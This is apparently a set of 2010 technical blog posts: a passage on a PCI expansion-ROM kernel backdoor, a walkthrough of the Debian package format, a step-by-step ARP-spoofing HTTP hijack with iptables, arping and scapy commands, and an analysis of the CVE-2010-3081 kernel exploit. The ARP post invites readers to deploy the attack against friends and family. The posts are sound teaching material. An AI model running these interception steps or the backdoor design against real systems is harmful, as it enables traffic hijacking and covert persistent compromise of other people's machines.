What we're going to do is cheat and find some data which isn't used for anything terribly important, and overwrite it with our own data. In general, it's hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it's unlikely to ever be triggered. We'll need well under 180 bytes for our data, so let's look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep  '^.{180}' | less
One of the output lines is this one:
<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.
This sounds pretty obscure to me, and a Google search doesn't find any occurrences of this message which aren't from the kernel source code. So, we're going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don't expect the decompression to fail, because we didn't modify the compressed image at all. So we'll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines an "expansion ROM" mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we'll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn't know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we're going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that's just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.

In summary, the boot process of the system with our PCI card inserted looks like this:

  • The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
  • The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
  • The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
  • GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
  • GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
  • The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
  • The kernel continues to boot normally.
We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it's not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn't realistically worry about installing commodity hardware from reputable vendors. After all, you're already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.

~rwbarton

Wednesday Oct 06, 2010

Anatomy of a Debian package

Ever wondered what a .deb file actually is? How is it put together, and what's inside it, besides the data that is installed to your system when you install the package? Today we're going to break out our sysadmin's toolbox and find out. (While we could just turn to deb(5), that would ruin the fun.) You'll need a Debian-based system to play along. Ubuntu and other derivatives should work just fine.

Finding a file to look at

Whenever APT downloads a package to install, it saves it in a package cache, located in /var/cache/apt/archives/. We can poke around in this directory to find a package to look at.
spang@sencha:~> cd /var/cache/apt/archives
spang@sencha:/var/cache/apt/archives>
spang@sencha:/var/cache/apt/archives> ls
apache2-utils_2.2.16-2_amd64.deb
app-install-data_2010.08.21_all.deb
apt_0.8.0_amd64.deb
apt_0.8.5_amd64.deb
aptitude_0.6.3-3.1_amd64.deb
...
nano, the text editor, ought to be a simple package. Let's take a look at that one.

spang@sencha:/var/cache/apt/archives> cp nano_2.2.5-1_amd64.deb ~/tmp/blog
spang@sencha:/var/cache/apt/archives> cd ~/tmp/blog

Digging in

Let's see what we can figure out about this file. The file command is a nifty tool that tries to figure out what kind of data a file contains.

spang@sencha:~/tmp/blog> file --raw --keep-going nano_2.2.5-1_amd64.deb 
nano_2.2.5-1_amd64.deb: Debian binary package (format 2.0)
- current ar archive
- archive file
Hmm, so file, which identifies filetypes by performing tests on them (rather than by looking at the file extension or something else cosmetic), must have a special test that identifies Debian packages. Since we passed the command the --keep-going option, though, it continued on to find other tests that match against the file, which is useful because these later matches are less specific, and in our case they tell us what a "Debian binary package" actually is under the hood—an "ar" archive!
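
The ar container is simple enough to walk by hand, if you're curious. Here's a short Python sketch that lists the members of a .deb without any ar or dpkg tooling (it assumes the newer 2.0 format, i.e. a plain ar archive):

#!/usr/bin/env python3
# Walk the ar(1) container by hand: an 8-byte magic string, then a
# series of 60-byte member headers, each followed by the member's data
# padded to an even offset.
import sys

with open(sys.argv[1], "rb") as f:
    assert f.read(8) == b"!<arch>\n"      # global ar magic
    while True:
        header = f.read(60)
        if len(header) < 60:
            break
        name = header[0:16].decode().strip()
        size = int(header[48:58].decode())
        print("%-20s %d bytes" % (name, size))
        f.seek(size + size % 2, 1)        # data is padded to an even length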

Aside: a little bit of history

Back in the day, in 1995 and before, Debian packages used to use their own ad-hoc archive format. These days, you can find that old format documented in deb-old(5). The new format was added to be "saner and more extensible" than the original. You can still find binaries in the old format on archive.debian.org. You'll see that file tells us that these debs are different; it doesn't know how to identify them in a more specific way than "a bunch of bits":

spang@sencha:~/tmp/blog> file --raw --keep-going adduser-1.94-1.deb
adduser-1.94-1.deb: data
Now we can crack open the deb using the ar utility to see what's inside.

Inside the box

ar takes an operation code, modifier flags, and the archive to act upon as its arguments. The x operation tells it to extract files, and the v modifier tells it to be verbose.

spang@sencha:~/tmp/blog> ar vx nano_2.2.5-1_amd64.deb
x - debian-binary
x - control.tar.gz
x - data.tar.gz
So, we have three files.

debian-binary

spang@sencha:~/tmp/blog> cat debian-binary
2.0
This is just the version number of the binary package format being used, so tools know what they're dealing with and can modify their behaviour accordingly. One of file's tests uses the string in this file to add the package format to its output, as we saw earlier.

control.tar.gz

spang@sencha:~/tmp/blog> tar xzvf control.tar.gz
./
./postinst
./control
./conffiles
./prerm
./postrm
./preinst
./md5sums
These control files are used by the tools that work with the package and install it to the system—mostly dpkg.

control
spang@sencha:~/tmp/blog> cat control
Package: nano
Version: 2.2.5-1
Architecture: amd64
Maintainer: Jordi Mallach 
Installed-Size: 1824
Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info
Suggests: spell
Conflicts: pico
Breaks: alpine-pico (<= 2.00+dfsg-5)
Replaces: pico
Provides: editor
Section: editors
Priority: important
Homepage: http://www.nano-editor.org/
Description: small, friendly text editor inspired by Pico
 GNU nano is an easy-to-use text editor originally designed as a replacement
 for Pico, the ncurses-based editor from the non-free mailer package Pine
 (itself now available under the Apache License as Alpine).
 .
 However, nano also implements many features missing in pico, including:
  - feature toggles;
  - interactive search and replace (with regular expression support);
  - go to line (and column) command;
  - auto-indentation and color syntax-highlighting;
  - filename tab-completion and support for multiple buffers;
  - full internationalization support.
This file contains a lot of important metadata about the package. In this case, we have:
  • its name
  • its version number
  • binary-specific information: which architecture it was built for, and how many bytes it takes up after it is installed
  • its relationship to other packages (on the Depends, Suggests, Conflicts, Breaks, and Replaces lines)
  • the person who is responsible for this package in Debian (the "maintainer")
  • how the package is categorized in Debian as a whole: nano is in the "editors" section. A complete list of archive sections can be found here.
  • a "priority" rating. "Important" means that the package "should be found on any Unix-like system". You'd be hard-pressed to find a Debian system without nano.
  • a homepage
  • a description which should provide enough information for an interested user to figure out whether or not she wants to install the package
One line that takes a bit more explanation is the "Provides:" line. This means that nano, when installed, will not only count as having the nano package installed, but also as the editor package, which doesn't really exist—it is only provided by other packages. This way other packages which need a text editor can depend on "editor" and not have to worry about the fact that there are many different sufficient choices available.

You can get most of this same information for installed packages and packages from your configured package repositories using the command aptitude show <packagename>, or dpkg --status <packagename> if the package is installed.

postinst, prerm, postrm, preinst
These files are maintainer scripts. If you take a look at one, you'll see that it's just a shell script that is run at some point during the [un]installation process.

spang@sencha:~/tmp/blog> cat preinst
#!/bin/sh

set -e

if [ "$1" = "upgrade" ]; then
    if dpkg --compare-versions "$2" lt 1.2.4-2; then
	if [ ! -e /usr/man ]; then
	    ln -s /usr/share/man /usr/man
	    update-alternatives --remove editor /usr/bin/nano || RET=$?
	    rm /usr/man
	    if [ -n "$RET" ]; then
	        exit $RET
	    fi
	else
	    update-alternatives --remove editor /usr/bin/nano
	fi
    fi
fi
More on the nitty-gritty of maintainer scripts can be found here.

conffiles
spang@sencha:~/tmp/blog> cat conffiles 
/etc/nanorc
Any configuration files for the package, generally found in /etc, are listed here, so that dpkg knows not to blindly overwrite any local configuration changes you've made when it upgrades the package.

md5sums
This file contains checksums of each of the data files in the package so dpkg can make sure they weren't corrupted or tampered with.
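
dpkg does this check for us, but it's easy to redo by hand. A short Python sketch that recomputes the checksums against the files extracted from data.tar.gz into the current directory:

#!/usr/bin/env python3
# Recompute the checksums in md5sums against the files extracted from
# data.tar.gz into the current directory.
import hashlib

with open("md5sums") as f:
    for line in f:
        expected, path = line.split(None, 1)
        path = path.strip()
        with open(path, "rb") as data:
            actual = hashlib.md5(data.read()).hexdigest()
        print("%s  %s" % ("OK " if actual == expected else "BAD", path))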

data.tar.gz

Here are the actual data files that will be added to your system's / when the package is installed.
spang@sencha:~/tmp/blog> tar xzvf data.tar.gz
./
./bin/
./bin/nano
./usr/
./usr/bin/
./usr/share/
./usr/share/doc/
./usr/share/doc/nano/
./usr/share/doc/nano/examples/
./usr/share/doc/nano/examples/nanorc.sample.gz
./usr/share/doc/nano/THANKS
./usr/share/doc/nano/changelog.gz
./usr/share/doc/nano/BUGS.gz
./usr/share/doc/nano/TODO.gz
./usr/share/doc/nano/NEWS.gz
./usr/share/doc/nano/changelog.Debian.gz
[...]
./etc/
./etc/nanorc
./bin/rnano
./usr/bin/nano

Finishing up

That's it! That's all there is inside a Debian package. Of course, no one building a package for Debian-based systems would do the reverse of what we just did, using raw tools like ar, tar, and gzip. Debian packages use a make-based build system, and learning how to build them using all the tools that have been developed for this purpose is a topic for another time. If you're interested, the new maintainer's guide is a decent place to start.

And next time, if you need to take a look inside a .deb again, use the dpkg-deb utility:

spang@sencha:~/tmp/blog> dpkg-deb --extract nano_2.2.5-1_amd64.deb datafiles
spang@sencha:~/tmp/blog> dpkg-deb --control nano_2.2.5-1_amd64.deb controlfiles
spang@sencha:~/tmp/blog> dpkg-deb --info nano_2.2.5-1_amd64.deb
 new debian package, version 2.0.
 size 566450 bytes: control archive= 3569 bytes.
      12 bytes,     1 lines      conffiles            
    1010 bytes,    26 lines      control              
    5313 bytes,    80 lines      md5sums              
     582 bytes,    19 lines   *  postinst             #!/bin/sh
     160 bytes,     5 lines   *  postrm               #!/bin/sh
     379 bytes,    20 lines   *  preinst              #!/bin/sh
     153 bytes,    10 lines   *  prerm                #!/bin/sh
 Package: nano
 Version: 2.2.5-1
 Architecture: amd64
 Maintainer: Jordi Mallach 
 Installed-Size: 1824
 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info
 Suggests: spell
 Conflicts: pico
 Breaks: alpine-pico (<= 2.00+dfsg-5)
 Replaces: pico
 Provides: editor
 Section: editors
 Priority: important
 Homepage: http://www.nano-editor.org/
 Description: small, friendly text editor inspired by Pico
  GNU nano is an easy-to-use text editor originally designed as a replacement
  for Pico, the ncurses-based editor from the non-free mailer package Pine
  (itself now available under the Apache License as Alpine).
  .
  However, nano also implements many features missing in pico, including:
   - feature toggles;
   - interactive search and replace (with regular expression support);
   - go to line (and column) command;
   - auto-indentation and color syntax-highlighting;
   - filename tab-completion and support for multiple buffers;
   - full internationalization support.

If the package format ever changes again, dpkg-deb will too, and you won't even need to notice.

~spang



Wednesday Sep 29, 2010

Hijacking HTTP traffic on your home subnet using ARP and iptables

Let's talk about how to hijack HTTP traffic on your home subnet using ARP and iptables. It's an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols.

Please don't experiment with this outside of a subnet under your control -- it's against the law and it might be hard to get things back to their normal state.

The setup

Significant other comes home from work. SO pulls out laptop and tries to catch up on social media like every night. SO instead sees awesome personalized web page proposing marriage:

will you marry me, with unicorns

How do we accomplish this?

The key player is ARP, the "Address Resolution Protocol" responsible for associating Internet Layer addresses with Link Layer addresses. This usually means determining the MAC address corresponding to a given IP address.

ARP comes into play when you, for example, head over to a friend's house, pull out your laptop, and try to use the wireless to surf the web. One of the first things that probably needs to happen is determining the MAC address of the gateway (probably your friend's router), so that the Ethernet packets containing all those IP[TCP[HTTP]] requests you want to send out to the Internet know how to get to their first hop, the gateway.

Your laptop finds out the MAC address of the gateway by asking. It broadcasts an ARP request for "Who has IP address 192.168.1.1", and the gateway broadcasts an ARP response saying "I have 192.168.1.1, and my MAC address is xx:xx:xx:xx:xx:xx". Your laptop, armed with the MAC address of the gateway, can then craft Ethernet packets that will go to the gateway and get routed out to the Internet.

But the gateway didn't really have to prove who it was. It just asserted who it was, and everyone listened. Anyone else can send an ARP response claiming to have IP address 192.168.1.1. And that's the ticket: if you can pretend to be the gateway, you can control all the packets that get routed through the gateway and the content returned to clients.

Step 1: The layout

I did this at home. The three machines involved were:

  • real gateway router: IP address 192.168.1.1, MAC address 68:7f:74:9a:f4:ca
  • fake gateway: a desktop called kid-charlemagne, IP address 192.168.1.200, MAC address 00:30:1b:47:f2:74
  • test machine getting duped: a laptop on wireless called pixeleen, IP address 192.168.1.111, MAC address 00:23:6c:8f:3f:95

The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains.

Step 2: Enable IPv4 forwarding

kid-charlemagne needs to receive packets that aren't destined for it (e.g. the web traffic). Unless IP forwarding is enabled, the networking subsystem is going to ignore packets that aren't destined for us. So the first thing to do is enable IP forwarding. All that takes is a non-zero value in /proc/sys/net/ipv4/ip_forward:

root@kid-charlemagne:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3: Set routing rules so packets going through the gateway get routed to you

kid-charlemagne is going to act like a little NAT. For HTTP packets heading out to the Internet, kid-charlemagne is going to rewrite the destination address in the IP packet headers to be its own IP address, so it becomes the final destination for the web traffic:

PREROUTING rule to rewrite the destination IP address

For HTTP packets heading back from kid-charlemagne to the client, it'll rewrite the source address to be that of the original destination out on the Internet.

We can set up this routing rule with the following iptables command:

jesstess@kid-charlemagne:~$ sudo iptables -t nat -A PREROUTING \
> -p tcp --dport 80 -j NETMAP --to 192.168.1.200

The iptables command has 3 components:

  • When to apply a rule (-A PREROUTING)
  • What packets get that rule (-p tcp --dport 80)
  • The actual rule (-t nat ... -j NETMAP --to 192.168.1.200)
When

-t says we're specifying a table. The nat table is where a lookup happens on packets that create new connections. The nat table comes with 3 built-in chains: PREROUTING, OUTPUT, and POSTROUTING. We want to add a rule in the PREROUTING chain, which will alter packets right as they come in, before routing rules have been applied.

What packets

That PREROUTING rule is going to apply to TCP packets destined for port 80 (-p tcp --dport 80), aka HTTP traffic. For packets that match this filter, jump (-j) to the following action:

The rule

If we receive a packet heading for some destination, rewrite the destination in the IP header to be 192.168.1.200 (NETMAP --to 192.168.1.200). Have the nat table keep a mapping between the original destination and rewritten destination. When a packet is returning through us to its source, rewrite the source in the IP header to be the original destination.

In summary: "If you're a TCP packet destined for port 80 (HTTP traffic), actually make my address, 192.168.1.200, the destination, NATting both ways so this is transparent to the source."

One last thing:

The networking subsystem will not let you send ARPs claiming an IP address that isn't actually assigned to the interface -- try it and you'll get a bind error along the lines of "Cannot assign requested address". We can handle this by adding the gateway's IP address to the interface that is going to send packets to pixeleen, the test client. kid-charlemagne is wired, so that's eth0.

jesstess@kid-charlemagne:~$ sudo ip addr add 192.168.1.1/24 dev eth0

We can check our work by listing our interfaces' addresses and noting that we now have two IP addresses on eth0: the original address 192.168.1.200 and the gateway address 192.168.1.1.

jesstess@kid-charlemagne:~$ ip addr
...
3: eth0:  mtu 1500 qdisc noqueue state UNKNOWN
    link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.200/24 brd 192.168.1.255 scope global eth0
    inet 192.168.1.1/24 scope global secondary eth0
    inet6 fe80::230:1bff:fe47:f274/64 scope link
       valid_lft forever preferred_lft forever
...

Step 4: Set yourself up to respond to HTTP requests

kid-charlemagne happens to have Apache set up. You could run any minimalist web server that would, given a request for an arbitrary resource, do something interesting.
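
If you don't have Apache handy, a few lines of Python will do. Here's a minimal sketch (my own stand-in, not what actually ran on kid-charlemagne) that answers every GET request with the same page:

#!/usr/bin/python
# Minimal catch-all web server: whatever resource the victim asks for, serve
# the same page. Needs root to bind to port 80, where our NETMAP rule sends
# all the hijacked HTTP traffic.
import BaseHTTPServer

class Hijacker(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write("<html><body><h1>Something interesting</h1></body></html>")

BaseHTTPServer.HTTPServer(("", 80), Hijacker).serve_forever()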

Step 5: Test pretending to be the gateway

At this point, kid-charlemagne is ready to pretend to be the gateway. The trouble is convincing pixeleen that the gateway's MAC address has changed to kid-charlemagne's. We can do this by sending a Gratuitous ARP, which is basically a packet that says "I know nobody asked, but I have the MAC address for 192.168.1.1". Machines that hear that Gratuitous ARP will replace an existing mapping from 192.168.1.1 to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP.

We can look at the ARP cache on pixeleen before and after sending the Gratuitous ARP to verify that the Gratuitous ARP is working.

pixeleen’s ARP cache before the Gratuitous ARP:

jesstess@pixeleen$ arp -a
? (192.168.1.1) at 68:7f:74:9a:f4:ca on en1 ifscope [ethernet]
? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]

68:7f:74:9a:f4:ca is the MAC address of the real gateway router.

There are lots of command line utilities and bindings in various programming languages that make it easy to issue ARP packets. I used the arping tool:

jesstess@kid-charlemagne:~$ sudo arping -c 3 -A -I eth0 192.168.1.1

We'll send a Gratuitous ARP reply (-A), three times (-c 3), on the eth0 interface (-I eth0), for IP address 192.168.1.1.
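
If you'd rather generate the packets from code, the Python library scapy is one such binding. Here's a rough sketch of the equivalent Gratuitous ARPs (an illustration assuming scapy is installed; it's not what I actually ran):

#!/usr/bin/python
# Broadcast a few unsolicited ARP replies announcing
# "192.168.1.1 is-at 00:30:1b:47:f2:74". Needs root.
from scapy.all import Ether, ARP, sendp

our_mac = "00:30:1b:47:f2:74"   # kid-charlemagne's MAC address
gateway_ip = "192.168.1.1"      # the IP address we're claiming

garp = Ether(src=our_mac, dst="ff:ff:ff:ff:ff:ff") / ARP(
    op=2, hwsrc=our_mac, psrc=gateway_ip,
    hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip)

sendp(garp, iface="eth0", count=3)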

As soon as we generate the Gratuitous ARPs, if we check pixeleen’s ARP cache:

jesstess@pixeleen$ arp -a
? (192.168.1.1) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]
? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]

Bam. pixeleen now thinks the MAC address for IP address 192.168.1.1 is 0:30:1b:47:f2:74, which is kid-charlemagne's address.

If I try to browse the web on pixeleen, I am served the resource matching the rules in kid-charlemagne’s web server.

We can watch this whole exchange in Wireshark:

First, the Gratuitous ARPs generated by kid-charlemagne:

Gratuitous ARPs generated by kid-c

The only traffic getting its headers rewritten so that kid-charlemagne is the destination is HTTP traffic: TCP traffic on port 80. That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when kid-charlemagne gets the DNS resolution requests for lycos.com, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet:

DNS response to pixeleen for lycos.com

The HTTP traffic gets served by kid-charlemagne:

HTTP traffic viewed in Wireshark

Note that the HTTP request has a source IP of 192.168.1.111, pixeleen, and a destination IP of 209.202.254.14, which dig -x 209.202.254.14 +short tells us is search-core1.bo3.lycos.com. The HTTP response has a source IP of 209.202.254.14 and a destination IP of 192.168.1.111. The fact that kid-charlemagne has rerouted and served the request is totally transparent to the client at the IP layer.
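
One quick way to see that transparency from the client's side (a hypothetical check, not part of the capture above): a socket opened on pixeleen still reports the Internet address as its peer, even though kid-charlemagne is the machine actually answering.

#!/usr/bin/python
# Hypothetical sanity check run on pixeleen: the client's own socket still
# believes it is connected to the real lycos.com address.
import socket

s = socket.create_connection(("lycos.com", 80))
print s.getpeername()   # something like ('209.202.254.14', 80)
s.close()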

Step 6: Deploy against friends and family

I trust you to get creative with this.

Step 7: Reset everything to the normal state

To get the normal gateway back in control, delete the IP address from the interface on kid-charlemagne and delete the iptables routing rule:

jesstess@kid-charlemagne:~$ sudo ip addr delete 192.168.1.1/24 dev eth0
jesstess@kid-charlemagne:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200

To get the client machines talking to the real gateway again, you might have to clear the stale gateway entry from their ARP caches with arp -d 192.168.1.1, or bring their interfaces down and back up. I can verify that my TiVo corrected itself quickly without any intervention, but I won't make any promises about your networked devices.

In summary

That was a lot of explanatory text, but the steps required to hijack the HTTP traffic on your home subnet can be boiled down to:

  1. enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
  2. set your routing rule: iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200
  3. add the gateway IP address to the appropriate interface: ip addr add 192.168.1.1/24 dev eth0
  4. ARP for the gateway MAC address: arping -c 3 -A -I eth0 192.168.1.1

substituting the appropriate IP address and interface information and tearing down when you're done.

And that's all there is to it!

This has been tested as working in a few environments, but it might not work in yours. I'd love to hear the details on if this works, works with modifications, or doesn't work (because the devices are being too clever about Gratuitous ARPs, or otherwise) in the comments.

--> Huge thank-you to fellow experimenter adamf. <--

~jesstess

Wednesday Sep 22, 2010

Anatomy of an exploit: CVE-2010-3081

It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines testing positive, via our diagnostic tool, for the backdoors left by the exploit.

The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security.

The Ingredients of an Exploit

There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system.

The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if "Ac1dB1tch3z" didn't already copy them from an earlier exploit, whether his or her own or someone else's, he or she will probably reuse them in future exploits.

Let's look at each of these in more detail.

The Bug: CVE-2010-3081

An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel.

The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable:

  • We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode.
  • The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct.
  • The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack.
Now, here's the core problem. That allocation routine went like this:
  static inline void __user *compat_alloc_user_space(long len)
  {
          struct pt_regs *regs = task_pt_regs(current);
          return (void __user *)regs->sp - len;
  }
The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check.

Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt():

  int compat_mc_getsockopt(struct sock *sock, int level, int optname,
          char __user *optval, int __user *optlen,
          int (*getsockopt)(struct sock *,int,int,char __user *,int __user *))
  {
This function calls compat_alloc_user_space(), and it fails to check that the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user.

So the attacker's strategy goes like so:

  • Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space.
  • When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code.
  • Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target.
The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself.

More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light.

The Target: Function Pointers Everywhere

The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload.

A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem.

  • The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen.
  • timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/.
  • The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code.
Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find.

The Payload: Steal Privileges

Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns.

